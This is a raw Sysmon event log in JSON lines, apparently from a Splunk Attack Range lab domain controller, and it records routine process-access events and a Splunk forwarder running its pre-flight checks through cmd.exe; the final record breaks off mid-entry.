{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1841,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.406\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nSourceProcessId: 1144\r\nSourceThreadId: 2204\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001095B80200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+25d35|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2619d|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.406","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","SourceProcessId":"1144","SourceThreadId":"2204","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001095B80200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+25d35|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2619d|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1842,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.406\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nSourceProcessId: 1144\r\nSourceThreadId: 2204\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001095B80200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x100000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+261b7|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.406","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","SourceProcessId":"1144","SourceThreadId":"2204","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001095B80200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x100000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+261b7|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1843,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.641\r\nSourceProcessGUID: {A837DB8D-01C7-5F25-0000-001041B70300}\r\nSourceProcessId: 3748\r\nSourceThreadId: 3752\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.641","SourceProcessGUID":"{A837DB8D-01C7-5F25-0000-001041B70300}","SourceProcessId":"3748","SourceThreadId":"3752","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","TargetProcessId":"3088","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1844,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.672\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.672","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","TargetProcessId":"3088","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1845,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.730\r\nProcessGuid: {A837DB8D-01C7-5F25-0000-0010B4BC0300}\r\nProcessId: 3724\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal pre-flight-checks --answer-yes --no-prompt 2>&1\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nParentProcessId: 3088\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.730","ProcessGuid":"{A837DB8D-01C7-5F25-0000-0010B4BC0300}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal pre-flight-checks --answer-yes --no-prompt 2&gt;&amp;1","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","ParentProcessId":"3088","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1846,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.719\r\nSourceProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nSourceProcessId: 3088\r\nSourceThreadId: 3772\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-01C7-5F25-0000-0010B4BC0300}\r\nTargetProcessId: 3724\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+eef54|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ebd15|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.719","SourceProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","SourceProcessId":"3088","SourceThreadId":"3772","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-01C7-5F25-0000-0010B4BC0300}","TargetProcessId":"3724","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+eef54|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ebd15|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1847,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.719\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C7-5F25-0000-0010B4BC0300}\r\nTargetProcessId: 3724\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.719","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C7-5F25-0000-0010B4BC0300}","TargetProcessId":"3724","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1848,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.719\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.719","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1849,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.719\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 